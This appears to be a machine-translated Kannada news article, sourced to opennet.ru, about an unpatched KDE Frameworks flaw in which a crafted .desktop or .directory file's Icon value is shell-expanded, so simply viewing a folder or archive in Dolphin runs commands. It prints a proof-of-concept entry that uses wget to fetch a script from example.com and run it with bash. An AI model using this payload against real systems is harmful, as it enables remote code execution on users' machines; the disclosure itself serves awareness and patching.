ಫೈಲ್‌ಗಳ ಪಟ್ಟಿಯನ್ನು ನೋಡುವಾಗ ಕೆಡಿಇ ಕೋಡ್ ಎಕ್ಸಿಕ್ಯೂಶನ್ ದುರ್ಬಲತೆ

ಕೆಡಿಇಯಲ್ಲಿ ಗುರುತಿಸಲಾಗಿದೆ ದುರ್ಬಲತೆ, ವಿಶೇಷವಾಗಿ ವಿನ್ಯಾಸಗೊಳಿಸಿದ “.ಡೆಸ್ಕ್‌ಟಾಪ್” ಮತ್ತು “.ಡೈರೆಕ್ಟರಿ” ಫೈಲ್‌ಗಳನ್ನು ಹೊಂದಿರುವ ಡೈರೆಕ್ಟರಿ ಅಥವಾ ಆರ್ಕೈವ್ ಅನ್ನು ಬಳಕೆದಾರರು ವೀಕ್ಷಿಸಿದಾಗ ಆಕ್ರಮಣಕಾರರಿಗೆ ಅನಿಯಂತ್ರಿತ ಆಜ್ಞೆಗಳನ್ನು ಕಾರ್ಯಗತಗೊಳಿಸಲು ಇದು ಅನುಮತಿಸುತ್ತದೆ. ದಾಳಿಗೆ ಬಳಕೆದಾರರು ಡಾಲ್ಫಿನ್ ಫೈಲ್ ಮ್ಯಾನೇಜರ್‌ನಲ್ಲಿ ಫೈಲ್‌ಗಳ ಪಟ್ಟಿಯನ್ನು ವೀಕ್ಷಿಸುವುದು, ದುರುದ್ದೇಶಪೂರಿತ ಡೆಸ್ಕ್‌ಟಾಪ್ ಫೈಲ್ ಅನ್ನು ಡೌನ್‌ಲೋಡ್ ಮಾಡುವುದು ಅಥವಾ ಶಾರ್ಟ್‌ಕಟ್ ಅನ್ನು ಡೆಸ್ಕ್‌ಟಾಪ್‌ಗೆ ಅಥವಾ ಡಾಕ್ಯುಮೆಂಟ್‌ಗೆ ಎಳೆಯುವ ಅಗತ್ಯವಿದೆ. ಲೈಬ್ರರಿಗಳ ಪ್ರಸ್ತುತ ಬಿಡುಗಡೆಯಲ್ಲಿ ಸಮಸ್ಯೆ ಸ್ವತಃ ಸ್ಪಷ್ಟವಾಗಿ ಗೋಚರಿಸುತ್ತದೆ ಕೆಡಿಇ ಫ್ರೇಮ್‌ವರ್ಕ್ಸ್ 5.60.0 ಮತ್ತು ಹಳೆಯ ಆವೃತ್ತಿಗಳು, ಕೆಡಿಇ 4 ವರೆಗೆ. ದುರ್ಬಲತೆ ಇನ್ನೂ ಇದೆ ಉಳಿದಿದೆ ಸರಿಪಡಿಸಲಾಗಿಲ್ಲ (CVE ನಿಯೋಜಿಸಲಾಗಿಲ್ಲ).

KDesktopFile ವರ್ಗದ ತಪ್ಪಾದ ಅಳವಡಿಕೆಯಿಂದ ಸಮಸ್ಯೆ ಉಂಟಾಗುತ್ತದೆ, ಇದು "ಐಕಾನ್" ವೇರಿಯೇಬಲ್ ಅನ್ನು ಪ್ರಕ್ರಿಯೆಗೊಳಿಸುವಾಗ, ಸರಿಯಾದ ಎಸ್ಕೇಪಿಂಗ್ ಇಲ್ಲದೆ, ಮೌಲ್ಯವನ್ನು KConfigPrivate ::expandString() ಕಾರ್ಯಕ್ಕೆ ರವಾನಿಸುತ್ತದೆ, ಇದು ಸಂಸ್ಕರಣೆ ಸೇರಿದಂತೆ ಶೆಲ್ ವಿಶೇಷ ಅಕ್ಷರಗಳ ವಿಸ್ತರಣೆಯನ್ನು ನಿರ್ವಹಿಸುತ್ತದೆ. "$(..)" ಸ್ಟ್ರಿಂಗ್‌ಗಳನ್ನು ಕಾರ್ಯಗತಗೊಳಿಸಬೇಕಾದ ಆಜ್ಞೆಗಳಂತೆ . XDG ವಿವರಣೆಯ ಅವಶ್ಯಕತೆಗಳಿಗೆ ವಿರುದ್ಧವಾಗಿ, ಅನುಷ್ಠಾನ ಬಹಿರಂಗಪಡಿಸುವಿಕೆ ಶೆಲ್ ರಚನೆಗಳನ್ನು ಸೆಟ್ಟಿಂಗ್‌ಗಳ ಪ್ರಕಾರವನ್ನು ಪ್ರತ್ಯೇಕಿಸದೆ ಉತ್ಪಾದಿಸಲಾಗುತ್ತದೆ, ಅಂದರೆ. ಪ್ರಾರಂಭಿಸಬೇಕಾದ ಅಪ್ಲಿಕೇಶನ್‌ನ ಕಮಾಂಡ್ ಲೈನ್ ಅನ್ನು ನಿರ್ಧರಿಸುವಾಗ ಮಾತ್ರವಲ್ಲ, ಪೂರ್ವನಿಯೋಜಿತವಾಗಿ ಪ್ರದರ್ಶಿಸಲಾದ ಐಕಾನ್‌ಗಳನ್ನು ನಿರ್ದಿಷ್ಟಪಡಿಸುವಾಗ.

ಉದಾಹರಣೆಗೆ, ದಾಳಿ ಮಾಡಲು ಸಾಕು ".ಡೈರೆಕ್ಟರಿ" ಫೈಲ್ ಅನ್ನು ಹೊಂದಿರುವ ಡೈರೆಕ್ಟರಿಯೊಂದಿಗೆ ಬಳಕೆದಾರರಿಗೆ ಜಿಪ್ ಆರ್ಕೈವ್ ಅನ್ನು ಕಳುಹಿಸಿ:

[ಡೆಸ್ಕ್ಟಾಪ್ ಎಂಟ್ರಿ]
ಟೈಪ್=ಡೈರೆಕ್ಟರಿ
ಐಕಾನ್[$e]=$(wget${IFS}https://example.com/FILENAME.sh&&/bin/bash${IFS}FILENAME.sh)

ನೀವು ಡಾಲ್ಫಿನ್ ಫೈಲ್ ಮ್ಯಾನೇಜರ್‌ನಲ್ಲಿ ಆರ್ಕೈವ್‌ನ ವಿಷಯಗಳನ್ನು ವೀಕ್ಷಿಸಲು ಪ್ರಯತ್ನಿಸಿದಾಗ, ಸ್ಕ್ರಿಪ್ಟ್ https://example.com/FILENAME.sh ಅನ್ನು ಡೌನ್‌ಲೋಡ್ ಮಾಡಲಾಗುತ್ತದೆ ಮತ್ತು ಕಾರ್ಯಗತಗೊಳಿಸಲಾಗುತ್ತದೆ.


ಮೂಲ: opennet.ru

ಕಾಮೆಂಟ್ ಅನ್ನು ಸೇರಿಸಿ